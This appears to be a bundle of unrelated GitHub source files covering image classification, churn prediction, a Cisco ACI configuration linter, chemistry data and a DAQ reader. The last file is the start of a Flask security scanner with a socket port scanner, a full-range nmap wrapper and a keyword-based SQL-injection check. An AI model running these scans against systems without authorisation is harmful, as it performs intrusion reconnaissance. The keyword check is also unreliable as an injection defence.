model): #resize 224\r\n \r\n result_normal = []\r\n result_tb = []\r\n \r\n print('test dataset predicting...')\r\n for index in test_df.index:\r\n \r\n filepath = test_df.Filepath[index]\r\n test_img = cv2.imread(filepath)\r\n \r\n #original prediction\r\n test_img = test_img.reshape((1,) + test_img.shape)\r\n prob = model.predict(test_img)\r\n result_tb.append(prob[0][0])\r\n result_normal.append(1-prob[0][0])\r\n\r\n test_df['Normal_Prob'] = result_normal \r\n test_df['TB_Prob'] = result_tb \r\n \r\n return test_df\r\n","repo_name":"xup6YJ/Tuberculosis-Classification","sub_path":"TB_Example/Train_function.py","file_name":"Train_function.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3382190204","text":"import cv2\n\nimg = cv2.imread('DATA/00-puppy.jpg')\n\nwhile True:\n\n cv2.imshow('Puppy',img)\n\n # EXPLANATION FOR THIS LINE OF CODE:\n # https://stackoverflow.com/questions/35372700/whats-0xff-for-in-cv2-waitkey1/39201163\n \n # IF we've waited at least 1 ms AND we've pressed the Esc\n if cv2.waitKey(1) & 0xFF == 27:\n break\n\ncv2.destroyAllWindows()\n","repo_name":"krishnaik06/Computer-Vision-","sub_path":"01-Image-Basics-with-OpenCV/01-Opening-Image-Files-OpenCV.py","file_name":"01-Opening-Image-Files-OpenCV.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"81"} +{"seq_id":"33404575598","text":"# Load the Model\nimport pickle\n\nmodel_file = \"model_C=1.0.bin\"\n\nwith open(model_file, \"rb\") as f_in:\n dv, model = pickle.load(f_in)\n\ncustomer = {\n \"gender\": \"female\",\n \"seniorcitizen\": 0,\n \"partner\": \"yes\",\n \"dependents\": \"no\",\n \"phoneservice\": \"no\",\n \"multiplelines\": \"no_phone_service\",\n \"internetservice\": \"dsl\",\n \"onlinesecurity\": \"no\",\n \"deviceprotection\": \"no\",\n \"techsupport\": \"no\",\n \"streamingtv\": \"no\",\n \"streamingmovies\": \"no\",\n \"contract\": \"month-to-month\",\n \"paperlessbilling\": \"yes\",\n \"paymentmethod\": \"electronic_check\",\n \"tenure\": 1,\n \"monthlycharges\": 29.85,\n \"totalcharges\": 29.85\n}\n\n# turn this customer into a feature matrix\nX = dv.transform([customer])\n\n# probabilty that this customer churns\n\ny_pred = model.predict_proba(X)[0,1]\n\nprint(\"input\", customer)\nprint(\"churn probabilty\", y_pred)\n","repo_name":"froukje/ml-zoomcamp","sub_path":"week5/lecture/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"11111437143","text":"import sys\nfrom acitoolkit.acitoolkit import Tenant, AppProfile, Context, EPG, BridgeDomain\nfrom acitoolkit.acitoolkit import OutsideL3, OutsideEPG, OutsideNetwork\nfrom acitoolkit.acitoolkit import Contract, ContractSubject, InputTerminal\nfrom acitoolkit.acitoolkit import OutputTerminal, Filter, FilterEntry\nfrom acitoolkit.acitoolkit import Credentials, Session\nfrom acitoolkit.acifakeapic import FakeSession\nimport argparse\nimport ipaddress\n\n\nclass Checker(object):\n \"\"\"\n Checker class contains a series of lint checks that are executed against the\n provided configuration.\n \"\"\"\n def __init__(self, session, output, fh=None):\n print('Getting configuration from APIC....')\n self.tenants = Tenant.get_deep(session)\n self.output = output\n self.file = fh\n print('Processing configuration....')\n\n def output_handler(self, msg):\n \"\"\"\n Print(the supplied string in a format appropriate to the output medium.)\n\n :param msg: The message to be printed.\n \"\"\"\n if self.output == 'console':\n print(msg)\n elif self.output == 'html':\n\n color_map = {'Error': '#FF8C00',\n 'Critical': '#FF0000',\n 'Warning': '#FFFF00'}\n\n sev = msg.split(':')[0].split(' ')[0]\n rule = msg.split(':')[0].split(' ')[1]\n descr = msg.split(': ')[1]\n self.file.write(\"\"\"\n \n {1}\n {2}\n {3}\n \n \"\"\".format(color_map[sev], sev, rule, descr))\n\n @staticmethod\n def ensure_tagged(objects, tags):\n \"\"\"\n Checks that a set of objects are tagged with at least one tag\n from the set of tags.\n \"\"\"\n for obj in objects:\n tagged = False\n for tag in tags:\n if obj.has_tag(tag):\n tagged = True\n if not tagged:\n return False\n return True\n\n def warning_001(self):\n \"\"\"\n W001: Tenant has no app profile\n \"\"\"\n for tenant in self.tenants:\n if len(tenant.get_children(AppProfile)) == 0:\n self.output_handler(\"Warning 001: Tenant '%s' has no Application \"\n \"Profile.\" % tenant.name)\n\n def warning_002(self):\n \"\"\"\n W002: Tenant has no context\n \"\"\"\n for tenant in self.tenants:\n if len(tenant.get_children(Context)) == 0:\n self.output_handler(\"Warning 002: Tenant '%s' has no Context.\" % tenant.name)\n\n def warning_003(self):\n \"\"\"\n W003: AppProfile has no EPGs\n \"\"\"\n for tenant in self.tenants:\n for app in tenant.get_children(AppProfile):\n if len(app.get_children(EPG)) == 0:\n self.output_handler(\"Warning 003: AppProfile '%s' in Tenant '%s'\"\n \"has no EPGs.\" % (app.name, tenant.name))\n\n def warning_004(self):\n \"\"\"\n W004: Context has no BridgeDomain\n \"\"\"\n for tenant in self.tenants:\n contexts = []\n for context in tenant.get_children(Context):\n contexts.append(context.name)\n for bd in tenant.get_children(BridgeDomain):\n if bd.has_context():\n context = bd.get_context().name\n if context in contexts:\n contexts.remove(context)\n for context in contexts:\n self.output_handler(\"Warning 004: Context '%s' in Tenant '%s' has no \"\n \"BridgeDomains.\" % (context, tenant.name))\n\n def warning_005(self):\n \"\"\"\n W005: BridgeDomain has no EPGs assigned\n \"\"\"\n for tenant in self.tenants:\n bds = []\n for bd in tenant.get_children(BridgeDomain):\n bds.append(bd.name)\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n if epg.has_bd():\n bd = epg.get_bd().name\n if bd in bds:\n bds.remove(bd)\n for bd in bds:\n self.output_handler(\"Warning 005: BridgeDomain '%s' in Tenant '%s'\"\n \" has no EPGs.\" % (bd, tenant.name))\n\n def warning_006(self):\n \"\"\"\n W006: Contract is not provided at all.\n \"\"\"\n for tenant in self.tenants:\n contracts = []\n for contract in tenant.get_children(Contract):\n contracts.append(contract.name)\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n provided = epg.get_all_provided()\n for contract in provided:\n if contract.name in contracts:\n contracts.remove(contract.name)\n for contract in contracts:\n self.output_handler(\"Warning 006: Contract '%s' in Tenant '%s' is not\"\n \" provided at all.\" % (contract, tenant.name))\n\n def warning_007(self):\n \"\"\"\n W007: Contract is not consumed at all.\n \"\"\"\n for tenant in self.tenants:\n contracts = []\n for contract in tenant.get_children(Contract):\n contracts.append(contract.name)\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n consumed = epg.get_all_consumed()\n for contract in consumed:\n if contract.name in contracts:\n contracts.remove(contract.name)\n for contract in contracts:\n self.output_handler(\"Warning 007: Contract '%s' in Tenant '%s' is not\"\n \" consumed at all.\" % (contract, tenant.name))\n\n def warning_008(self):\n \"\"\"\n W008: EPG providing contracts but in a Context with no enforcement.\n \"\"\"\n for tenant in self.tenants:\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n if len(epg.get_all_provided()):\n if epg.has_bd():\n bd = epg.get_bd()\n if bd.has_context():\n context = bd.get_context()\n if context.get_allow_all():\n self.output_handler(\"Warning 008: EPG '%s' providing \"\n \"contracts in Tenant '%s', App\"\n \"Profile '%s' but Context '%s' \"\n \"is not enforcing.\" % (epg.name,\n tenant.name,\n app.name,\n context.name))\n\n def warning_010(self):\n \"\"\"\n W010: EPG providing contract but consuming EPG is in a different\n context.\n \"\"\"\n provide_db = {}\n for tenant in self.tenants:\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n if epg.has_bd():\n bd = epg.get_bd()\n if bd.has_context():\n context = bd.get_context()\n provided = epg.get_all_provided()\n for contract in provided:\n if tenant.name not in provide_db:\n provide_db[tenant.name] = {}\n if contract.name not in provide_db[tenant.name]:\n provide_db[tenant.name][contract.name] = []\n if context.name not in provide_db[tenant.name][contract.name]:\n provide_db[tenant.name][contract.name].append(context.name)\n\n for tenant in self.tenants:\n if tenant.name not in provide_db:\n self.output_handler(\"Warning 010: No contract provided within\"\n \" this tenant '%s'\" % tenant.name)\n continue # don't repeat this message for each option below.\n epgs = []\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n epgs.append(epg)\n for epg in epgs:\n if epg.has_bd():\n bd = epg.get_bd()\n if bd.has_context():\n context = bd.get_context()\n consumed = epg.get_all_consumed()\n for contract in consumed:\n if contract.name not in provide_db[tenant.name]:\n self.output_handler(\"Warning 010: Contract '%s' not provided \"\n \"within the same tenant \"\n \"'%s'\" % (contract.name, tenant.name))\n elif context.name not in provide_db[tenant.name][contract.name]:\n self.output_handler(\"Warning 010: Contract '%s' not provided in context '%s' \"\n \"where it is being consumed for\"\n \" tenant '%s'\" % (contract.name, context.name, tenant.name))\n\n @staticmethod\n def subj_matches_proto(filterlist, protocol):\n \"\"\"\n This routine will return True/False if the list of filters has a filter\n that matches the specified protocol.\n\n :param filterlist: The list of filters to inspect.\n :param protocol: The protocol we are looking for.\n \"\"\"\n for subjfilter in filterlist:\n for entry in subjfilter.get_children(FilterEntry):\n entryAttrs = entry.get_attributes()\n if entryAttrs['prot'] == protocol:\n return True\n return False\n\n def warning_011(self):\n \"\"\"\n W011: Contract has Bidirectional TCP Subjects.\n \"\"\"\n for tenant in self.tenants:\n for contract in tenant.get_children(Contract):\n is_tcp_bidi = 0\n for subject in contract.get_children(ContractSubject):\n if self.subj_matches_proto(subject.get_filters(), 'tcp'):\n is_tcp_bidi = 3\n break\n\n in_terminal = subject.get_children(InputTerminal)\n out_terminal = subject.get_children(OutputTerminal)\n if in_terminal:\n in_filterlist = in_terminal[0].get_filters()\n else:\n in_filterlist = ()\n if out_terminal:\n out_filterlist = out_terminal[0].get_filters()\n else:\n out_filterlist = ()\n\n if in_filterlist:\n if self.subj_matches_proto(in_filterlist, 'tcp'):\n is_tcp_bidi = 1\n if out_filterlist:\n if self.subj_matches_proto(out_filterlist, 'tcp'):\n is_tcp_bidi += 1\n # Otherwise, either there are no terminals so it's a permit\n # everything which doesn't count.\n\n if is_tcp_bidi:\n break\n\n if is_tcp_bidi == 3:\n self.output_handler(\"Warning 011: In tenant '%s' contract \"\n \"'%s' is a Bidirectional TCP contract.\"\n % (tenant.name, contract.name))\n elif is_tcp_bidi == 2:\n self.output_handler(\"Warning 011: In tenant '%s' contract \"\n \"'%s' is an explictly \"\n \"Bidirectional TCP contract.\"\n % (tenant.name, contract.name))\n\n def warning_012(self):\n \"\"\"\n W012: Contract has Bidirectional UDP Subjects.\n \"\"\"\n for tenant in self.tenants:\n for contract in tenant.get_children(Contract):\n is_udp_bidi = 0\n for subject in contract.get_children(ContractSubject):\n if self.subj_matches_proto(subject.get_filters(), 'udp'):\n is_udp_bidi = 3\n break\n\n in_terminal = subject.get_children(InputTerminal)\n out_terminal = subject.get_children(OutputTerminal)\n if in_terminal:\n in_filterlist = in_terminal[0].get_filters()\n else:\n in_filterlist = ()\n if out_terminal:\n out_filterlist = out_terminal[0].get_filters()\n else:\n out_filterlist = ()\n\n if in_filterlist:\n if self.subj_matches_proto(in_filterlist, 'udp'):\n is_udp_bidi = 1\n if out_filterlist:\n if self.subj_matches_proto(out_filterlist, 'udp'):\n is_udp_bidi += 1\n # Otherwise, either there are no terminals so it's a permit\n # everything which doesn't count.\n\n if is_udp_bidi:\n break\n\n if is_udp_bidi == 3:\n self.output_handler(\"Warning 012: In tenant '%s' contract \"\n \"'%s' is a Bidirectional UDP contract.\"\n % (tenant.name, contract.name))\n elif is_udp_bidi == 2:\n self.output_handler(\"Warning 012: In tenant '%s' contract \"\n \"'%s' is an explictly \"\n \"Bidirectional UDP contract.\"\n % (tenant.name, contract.name))\n\n def warning_013(self):\n \"\"\"\n W013: Contract has no Subjects.\n \"\"\"\n for tenant in self.tenants:\n for contract in tenant.get_children(Contract):\n if len(contract.get_children(ContractSubject)) == 0:\n self.output_handler(\"Warning 013: In tenant '%s' contract \"\n \"'%s' has no Subjects.\"\n % (tenant.name, contract.name))\n\n def warning_014(self):\n \"\"\"\n W014: Contract has Subjects with no Filters.\n \"\"\"\n for tenant in self.tenants:\n for contract in tenant.get_children(Contract):\n missing_filter = False\n for subject in contract.get_children(ContractSubject):\n if len(subject.get_filters()) == 0:\n # No directly attached filters...\n for terminal in subject.get_children(InputTerminal):\n if len(terminal.get_filters()) == 0:\n for out_terminal in subject.get_children(OutputTerminal):\n if len(out_terminal.get_filters()) == 0:\n missing_filter = True\n if missing_filter:\n self.output_handler(\"Warning 014: In tenant '%s' contract \"\n \"'%s' subject '%s' has no Filters.\" % (tenant.name,\n contract.name,\n subject.name))\n\n def error_001(self):\n \"\"\"\n E001: BridgeDomain has no Context\n \"\"\"\n for tenant in self.tenants:\n for bd in tenant.get_children(BridgeDomain):\n if not bd.has_context():\n self.output_handler(\"Error 001: BridgeDomain '%s' in tenant '%s' \"\n \"has no Context assigned.\" % (bd.name, tenant.name))\n\n def error_002(self):\n \"\"\"\n E002: EPG has no BD assigned.\n \"\"\"\n for tenant in self.tenants:\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n if not epg.has_bd():\n self.output_handler(\"Error 002: EPG '%s' in Tenant '%s', \"\n \"AppProfile '%s' has no BridgeDomain \"\n \"assigned.\" % (epg.name, tenant.name,\n app.name))\n\n def error_004(self):\n # E004: EPG not assigned to an interface or VMM domain\n pass\n\n def error_005(self):\n \"\"\"\n E005: Overlapping subnets are defined in a single context.\n Note: Only subnets inside the fabric are inspected.\n \"\"\"\n for tenant in self.tenants:\n context_info = {}\n for bd in tenant.get_children(BridgeDomain):\n current_context = bd.get_context()\n if not current_context:\n # BridgeDomain has no Context so ignore it.\n continue\n if current_context not in context_info:\n context_info[current_context] = {'v4list': [],\n 'v6list': []}\n for subnet in bd.get_subnets():\n try:\n ip_subnet = ipaddress.ip_network(unicode(subnet.addr),\n strict=False)\n except NameError:\n # Python3 doesn't support unicode anymore\n ip_subnet = ipaddress.ip_network(str(subnet.addr),\n strict=False)\n index = 0\n index_to_insert = 0\n if ip_subnet.version == 4:\n address_list = context_info[current_context]['v4list']\n else:\n address_list = context_info[current_context]['v6list']\n\n while index < len(address_list):\n if ip_subnet == address_list[index]['addr']:\n index_to_insert = index\n if bd.name != address_list[index]['bd']:\n # Because sometimes they are equal...\n self.output_handler(\n \"Error 005: In tenant/context '{}/{}': \"\n \"subnet {} in BridgeDomain '{}' \"\n \"duplicated by subnet {} in BridgeDomain \"\n \"'{}'\".format(tenant.name,\n current_context,\n ip_subnet.with_prefixlen,\n bd.name,\n address_list[index][\n 'addr'].with_prefixlen,\n address_list[index]['bd']))\n elif ip_subnet < address_list[index]['addr']:\n index_to_insert = index + 1\n if ip_subnet.overlaps(address_list[index]['addr']):\n self.output_handler(\n \"Error 005: In tenant/context '{}/{}': \"\n \"subnet {} in BridgeDomain '{}' \"\n \"contains subnet {} in BridgeDomain \"\n \"'{}'\".format(tenant.name,\n current_context,\n ip_subnet.with_prefixlen,\n bd.name,\n address_list[index - 1][\n 'addr'].with_prefixlen,\n address_list[index - 1]['bd']))\n else:\n break\n elif address_list[index]['addr'].overlaps(ip_subnet):\n index_to_insert = index\n self.output_handler(\"Error 005: In tenant/context \"\n \"'{}/{}': subnet {} in \"\n \"BridgeDomain '{}' contains \"\n \"subnet {} in BridgeDomain \"\n \"'{}'\".format(tenant.name,\n current_context,\n address_list[index][\n 'addr'].with_prefixlen,\n address_list[index]['bd'],\n ip_subnet.with_prefixlen,\n bd.name))\n break\n index += 1\n if index_to_insert:\n address_list.insert(index_to_insert, {'addr': ip_subnet,\n 'bd': bd.name})\n else:\n address_list.insert(index, {'addr': ip_subnet,\n 'bd': bd.name})\n\n def error_006(self):\n \"\"\"\n E006: Check for duplicated subnets in ExternalNetworks.\n\n Check to ensure that the same subnet is not defined in two separate\n ExternalNetworks or between an ExternalNetwork and a BD within a\n single VRF. Overlapping but not the equal subnets are not a problem.\n \"\"\"\n for tenant in self.tenants:\n context_set = {}\n for l3out in tenant.get_children(OutsideL3):\n current_ctxt = l3out.get_context()\n if not current_ctxt:\n # OutsideL3 Network has no Context so ignore it.\n continue\n if current_ctxt.name not in context_set:\n context_set[current_ctxt.name] = {}\n current_subnets = context_set[current_ctxt.name]\n\n for extnet in l3out.get_children(OutsideEPG):\n for subnet in extnet.get_children(OutsideNetwork):\n if subnet.addr in current_subnets:\n current_subnets[subnet.addr].append(\n \"{}/{}/{}/{}\".format(tenant.name,\n current_ctxt.name,\n l3out.name,\n extnet.name))\n else:\n current_subnets[subnet.addr] = [\n \"{}/{}/{}/{}\".format(tenant.name,\n current_ctxt.name,\n l3out.name,\n extnet.name)]\n for current_ctxt in context_set:\n for subnet in context_set[current_ctxt]:\n if 1 < len(context_set[current_ctxt][subnet]):\n for subnet_info in context_set[current_ctxt][subnet]:\n self.output_handler(\n \"Error 006: In Tenant/Context/L3Out/ExtEPG \"\n \"'{}' found duplicate subnet {}.\".format(\n subnet_info, subnet))\n\n for bd in tenant.get_children(BridgeDomain):\n bd_ctxt = bd.get_context()\n if not bd_ctxt:\n # BridgeDomain has no Context so ignore it.\n continue\n if bd_ctxt.name not in context_set:\n # BridgeDomain Context has no associated ExternalNetworks so ignore it.\n continue\n for subnet in bd.get_subnets():\n ip_subnet = ipaddress.ip_network(str(subnet.addr),\n strict=False)\n ip_subnet_str = ip_subnet.network_address\n if ip_subnet_str in context_set[bd_ctxt.name]:\n for subnet_info in context_set[bd_ctxt.name][ip_subnet_str]:\n self.output_handler(\n \"Error 006: Subnet {0:s} in \"\n \"Tenant/Context/BridgeDomain '{}/{}/{}' \"\n \"conflicts with subnet {} in \"\n \"Tenant/Context/L3Out/ExtEPG '{}'.\".format(\n ip_subnet.with_prefixlen, tenant.name,\n bd_ctxt.name, bd.name, ip_subnet_str,\n subnet_info))\n\n def critical_001(self):\n \"\"\"\n This is an example of a compliance check where all EPGs are expected\n to be tagged with either 'secure' or 'nonsecure' and secure EPGs are\n not allowed to provide or consume contracts from nonsecure EPGs.\n \"\"\"\n for tenant in self.tenants:\n # Look at all the EPGs and verify that they are all\n # assigned a security level\n secure_epgs = []\n nonsecure_epgs = []\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n if not self.ensure_tagged([epg], ('secure', 'nonsecure')):\n self.output_handler(\"Critical 001: EPG '%s' in tenant '%s' \"\n \"app '%s' is not assigned security \"\n \"clearance\" % (epg.name, tenant.name, app.name))\n if epg.has_tag('secure'):\n if epg.has_tag('nonsecure'):\n self.output_handler(\"Critical 001: EPG '%s' in tenant '%s' \"\n \"app '%s' is assigned secure and nonsecure security \"\n \"clearance\" % (epg.name, tenant.name, app.name))\n # Squirrel away the Secure EPGs\n secure_epgs.append(epg)\n else:\n nonsecure_epgs.append(epg)\n\n # Verify that the secure EPGs are only providing/consuming from\n # secure EPGs\n for secure_epg in secure_epgs:\n for contract in secure_epg.get_all_provided():\n for nonsecure_epg in nonsecure_epgs:\n if nonsecure_epg.does_consume(contract):\n self.output_handler(\"Critical 001: Nonsecure EPG '%s' in tenant '%s' \"\n \"is consuming secure contract from 'EPG' %s\" % (nonsecure_epg.name,\n tenant.name,\n secure_epg.name))\n for contract in secure_epg.get_all_consumed():\n for nonsecure_epg in nonsecure_epgs:\n if nonsecure_epg.does_provide(contract):\n self.output_handler(\"Critical 001: Nonsecure EPG '%s' in tenant '%s' \"\n \"is providing contract to secure EPG '%s'\" % (nonsecure_epg.name,\n tenant.name,\n secure_epg.name))\n\n def execute(self, methods):\n for method in methods:\n getattr(self, method)()\n\n\ndef acilint():\n \"\"\"\n Main execution routine\n\n :return: None\n \"\"\"\n description = ('acilint - A static configuration analysis tool. '\n 'Checks can be individually disabled by generating'\n ' and editing a configuration file. If no config '\n 'file is given, all checks will be run.')\n creds = Credentials('apic', description)\n creds.add_argument('-c', '--configfile', type=argparse.FileType('r'))\n creds.add_argument('-g', '--generateconfigfile',\n type=argparse.FileType('w'))\n creds.add_argument('-o', '--output', required=False, default='console')\n args = creds.get()\n if args.generateconfigfile:\n print('Generating configuration file....')\n f = args.generateconfigfile\n f.write(('# acilint configuration file\\n# Remove or comment out any '\n 'warnings or errors that you no longer wish to see\\n'))\n methods = dir(Checker)\n for method in methods:\n if method.startswith(('warning_', 'critical_', 'error_')):\n f.write(method + '\\n')\n f.close()\n sys.exit(0)\n\n methods = []\n if args.configfile:\n f = args.configfile\n for line in f:\n method = line.split('\\n')[0]\n if method in dir(Checker) and method.startswith(('warning_', 'error_', 'critical_')):\n methods.append(method)\n f.close()\n else:\n for method in dir(Checker):\n if method.startswith(('warning_', 'error_', 'critical_')):\n methods.append(method)\n\n if args.snapshotfiles:\n session = FakeSession(filenames=args.snapshotfiles)\n else:\n # Login to APIC\n session = Session(args.url, args.login, args.password)\n resp = session.login()\n if not resp.ok:\n print('%% Could not login to APIC')\n sys.exit(0)\n\n html = None\n if args.output == 'html':\n print('Creating file lint.html')\n html = open('lint.html', 'w')\n html.write(\"\"\"\n \n \n \n \n \n \n \"\"\")\n\n checker = Checker(session, args.output, html)\n checker.execute(methods)\n\n\nif __name__ == \"__main__\":\n acilint()\n","repo_name":"datacenter/acitoolkit","sub_path":"applications/lint/acilint.py","file_name":"acilint.py","file_ext":"py","file_size_in_byte":31285,"program_lang":"python","lang":"en","doc_type":"code","stars":341,"dataset":"github-code","pt":"81"} +{"seq_id":"37901803590","text":"\nimport numpy as np\nimport pandas as pd\n\n# Table 1.4 in Draine (2011) : Protosolar abundances of the Elements with $Z <= 32$\n# (based on Asplund+2009)\n\nclass AbundanceSolar(object):\n def __init__(self, xHe=9.55e-2, Zprime=1.0):\n\n self.Zprime = Zprime\n \n data = {'Z': np.arange(32) + 1,\n 'X': np.array([ 'H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O',\n 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S',\n 'Cl', 'Ar', 'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr',\n 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge']),\n 'mX_amu': np.array([ 1.008, 4.0026, 6.941, 9.012, 10.811, 12.011, 14.007, 15.999,\n 18.998, 20.180, 22.990, 24.305, 26.982, 28.086, 30.974, 32.065,\n 35.453, 39.948, 39.098, 40.078, 44.956, 47.867, 50.942, 51.996,\n 54.938, 55.845, 58.933, 58.693, 63.546, 65.380, 69.723, 72.640]),\n 'NX_NH': np.array([1.0, 9.55e-2, 2.00e-9, 2.19e-11, 6.76e-10, 2.95e-4, 7.41e-5, 5.37e-4,\n 2.88e-8, 9.33e-5, 2.04e-6, 4.37e-5, 2.95e-6, 3.55e-5, 3.23e-7, 1.45e-5,\n 1.86e-7, 2.75e-6, 1.32e-7, 2.14e-6, 1.23e-9, 8.91e-8, 1.00e-8, 4.79e-7,\n 3.31e-7, 3.47e-5, 8.13e-8, 1.74e-6, 1.95e-8, 4.68e-8, 1.32e-9, 4.17e-9])\n }\n \n df = pd.DataFrame.from_dict(data)\n\n # Adjust Helium abundance\n df.loc[df['X'] == 'He', 'NX_NH'] = xHe\n\n # Scale metal abundance by Zprime\n df.loc[df['Z'] > 2, 'NX_NH'] *= self.Zprime\n\n # Mass [amu] for nH=1 \n df['MX_per_H'] = df['mX_amu']*df['NX_NH']\n\n # Mass fraction\n # divide by MH = 1.008 amu so that MX_MH = 1.0 for H\n df['MX_MH'] = df['MX_per_H']/df.loc[0, 'MX_per_H']\n\n self.df = df\n\n def get_XYZ_muH_mu(self):\n \"\"\"Compute XYZ, muH, and mu.\n Dust depletion is ignored.\n \"\"\"\n \n df = self.df\n xHe = df[df['X'] == 'He']['NX_NH'].iloc[0]\n xMetal = df[df['Z'] > 2]['NX_NH'].sum()\n\n # Total mass (in units of amu) per H\n Mtot = df['MX_per_H'].sum()\n \n # Mean molecular weight per H (in units of mH)\n muH = Mtot/1.008\n \n # Mass fraction of H, He, and Metals\n X = df[df['X'] == 'H']['MX_MH'].iloc[0]/Mtot\n Y = df[df['X'] == 'He']['MX_MH'].iloc[0]/Mtot\n Z = df[df['Z'] > 2]['MX_MH'].sum()/Mtot\n\n # Mean molecular weight (per particle)\n # Fully atomic\n mu_atom = df['MX_MH'].sum()/df['NX_NH'].sum()\n\n # Fully ionized\n xe_ion = (df['NX_NH']*df['Z']).sum()\n mu_ion = df['MX_MH'].sum()/(df['NX_NH']*(1.0 + df['Z'])).sum()\n\n # print('xHe, xMetal, X, Y, Z, muH')\n # print(xHe, xMetal, X, Y, Z, muH)\n\n res = dict()\n res['xHe'] = xHe\n res['xMetal'] = xMetal\n res['X'] = X\n res['Y'] = Y\n res['Z'] = Z\n res['muH'] = muH\n res['mu_atom'] = mu_atom\n res['mu_ion'] = mu_ion\n res['xe_ion'] = xe_ion\n res['df'] = df\n \n return res\n\n\n","repo_name":"jeonggyukim/pyathena","sub_path":"pyathena/microphysics/abundance_solar.py","file_name":"abundance_solar.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"15100456976","text":"start = int(input())\n\nresult = 0\nif start == 1:\n A = 1\n B = 2\nelse :\n B = 1\n A = 2 \n\nA_list = []\nB_list = []\nwin_dict = {\n 1:[[1,1],[1,2],[1,3]],\n }\n\nwhile result == 0:\n A_x, A_y = map(int, input().split())\n B_x, B_y = map(int, input().split())\n\n A_list.append([A_x,A_y])\n B_list.append([B_x,B_y])\n\n # print(A_list)\n # print(B_list)\n\n \n\n\n\n\n\n\n","repo_name":"choihyeonseok/algo","sub_path":"bj/12759.PY","file_name":"12759.PY","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41166062187","text":"import pandas as pd\nfrom multiprocessing import Pool\nimport os\ndef read_daq(file_path):\n\ttry:\n\t#file_path = r'C:\\Users\\ian.jacobi\\Documents\\ltere\\G5 NIAGARA NL1201.txt'\n\t\tfile_name = file_path.split('\\\\')[-1]\n\t\tdf= pd.read_csv(file_path, sep = '\\t', skiprows =7, usecols = [0,1,2,3,4,5,6,])\n\t\tdf.columns = ['Date', 'Time', 'Mean Flue Temp', 'Mean Hot Water', 'Mean Inlet Water', 'Mean Inlet Air', ' Unused']\n\t\tstation = file_name.split(' ')[0]\n\t\tdf[\"Station\"] = station\n\t\tdf.Date = pd.to_datetime(df.Date, infer_datetime_format=True).dt.date\n\t\tstart_date = df.Date.values[0]\n\t\tprint(start_date)\n\t\tstart_week = start_date.isocalendar()[1]\n\t\tdf[\"Week\"] = [f.isocalendar()[1] + (((f.year-start_date.year)* 52)) - (start_week ) for f in df.Date.values.tolist()]\n\t\tresult_dir = 'C:/Niagara/DAQ/'\n\t\tif not os.path.exists(result_dir):\n\t\t\tos.mkdir(reult_dir)\n\t\tdf.to_csv('C:/Niagara/DAQ/' + file_name[:-4] + '.csv')\n\texcept Exception as e:\n\t\traise e\nif __name__ == '__main__':\n\tpool = Pool()\n\tfiles = [f.path for f in os.scandir(r'\\\\onerheem\\whd-onerheemdfs\\Data on BDATAPROD2\\RDDEPT\\Satellite Lab\\Reliability EC Folders\\EC06619 -NIAGARA 2018 TAKASHI\\NL TESTING 2018\\Station data')]\n\tprint(files)\n\n\tpool.map(read_daq, files)","repo_name":"LilyKeeter/Reliability","sub_path":"NiagaraRel&Field/run_DAQ.py","file_name":"run_DAQ.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31579582671","text":"from flask import Flask, render_template, request, redirect, url_for, session\n\nimport socket\nimport requests\nimport re\nimport subprocess\n\n\napp = Flask(__name__)\napp.secret_key = 'your_secret_key'\n\ndef scan_ports(target, ports):\n open_ports = []\n for port in ports:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(1)\n result = sock.connect_ex((target, port))\n if result == 0:\n open_ports.append(port)\n sock.close()\n return open_ports\n\ndef check_clickjacking_vulnerability(url):\n try:\n response = requests.get(url, allow_redirects=True)\n response.raise_for_status()\n\n headers = response.headers\n\n if 'X-Frame-Options' in headers:\n clickjacking_status = \"Not vulnerable to Clickjacking\"\n else:\n clickjacking_status = \"Vulnerable to Clickjacking\"\n\n return clickjacking_status\n\n except requests.RequestException as e:\n return f\"Error accessing website: {e}\"\n\ndef check_sql_injection(input_string):\n sql_injection_pattern = re.compile(r'\\b(union|select|from|where|and|or)\\b', re.IGNORECASE)\n if sql_injection_pattern.search(input_string):\n return \"Potential SQL Injection detected\"\n else:\n return \"No SQL Injection detected\"\n\ndef check_patch_status(software_version):\n # Example: Check if the software version is up-to-date\n latest_version = \"2.0\"\n if software_version == latest_version:\n return \"Software is up-to-date\"\n else:\n return f\"Software update available. Latest version: {latest_version}\"\n\ndef apply_patch(software_version):\n # Placeholder: Simulate applying a patch\n updated_version = \"2.0\"\n return f\"update version available to update {updated_version}\"\n\ndef run_nmap_scan(target_ip):\n try:\n result = subprocess.run(['nmap', '-p-', '--open', target_ip], capture_output=True, text=True)\n open_ports_lines = re.findall(r'(\\d+\\/[a-zA-Z]+)\\s+open.*', result.stdout)\n open_ports = \"\\n\".join(open_ports_lines) if open_ports_lines else \"No open ports found\"\n return open_ports\n except FileNotFoundError:\n return \"Nmap not found. Make sure Nmap is installed on your system.\"\n\n@app.route('/')\n\ndef index():\n 